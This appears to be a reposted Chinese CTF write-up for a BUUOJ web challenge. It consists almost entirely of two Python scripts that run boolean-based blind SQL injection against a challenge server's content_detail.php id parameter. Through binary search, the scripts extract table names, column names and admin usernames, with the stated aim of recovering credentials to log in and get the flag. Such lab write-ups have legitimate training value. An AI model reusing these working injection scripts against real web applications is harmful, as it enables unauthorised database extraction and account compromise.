布尔盲注,爆出用户密码登录得flag
import requests
url = "http://28efd88e-90e7-48b0-aa07-9ed14c473b27.node3.buuoj.cn/backend/content_detail.php?id=2^"
name = ""
i=0
while True :
head = 32
tail = 127
i += 1
while(head<tail):
mid = head + tail >> 1
payload = "(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)" %(i,mid)
payload = "(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=‘contents‘)),%d,1))>%d)" %(i,mid)
payload = "(ascii(substr((select(group_concat(username))from(admin)),%d,1))>%d)" %(i,mid)
r = requests.get(url+payload)
#print(url+payload)
#print(r.json())
if "Yunen" in str(r.json()):
head = mid + 1
else:
tail = mid
if head!=32 :
name += chr(head)
print(name)
else:
break
import requests
url = "http://28efd88e-90e7-48b0-aa07-9ed14c473b27.node3.buuoj.cn/backend/content_detail.php?id="
name = ""
i=0
while True :
head = 32
tail = 127
i += 1
while(head<tail):
mid = head + tail >> 1
payload = "if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,3,2)" %(i,mid)
payload = "if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=‘contents‘)),%d,1))>%d,3,2)" %(i,mid)
payload = "if(ascii(substr((select(group_concat(username))from(admin)),%d,1))>%d,3,2)" %(i,mid)
r = requests.get(url+payload)
#print(url+payload)
#print(r.json())
if "Yunen" in str(r.json()):
head = mid + 1
else:
tail = mid
if head!=32 :
name += chr(head)
print(name)
else:
break
原文:https://www.cnblogs.com/h3zh1/p/13057730.html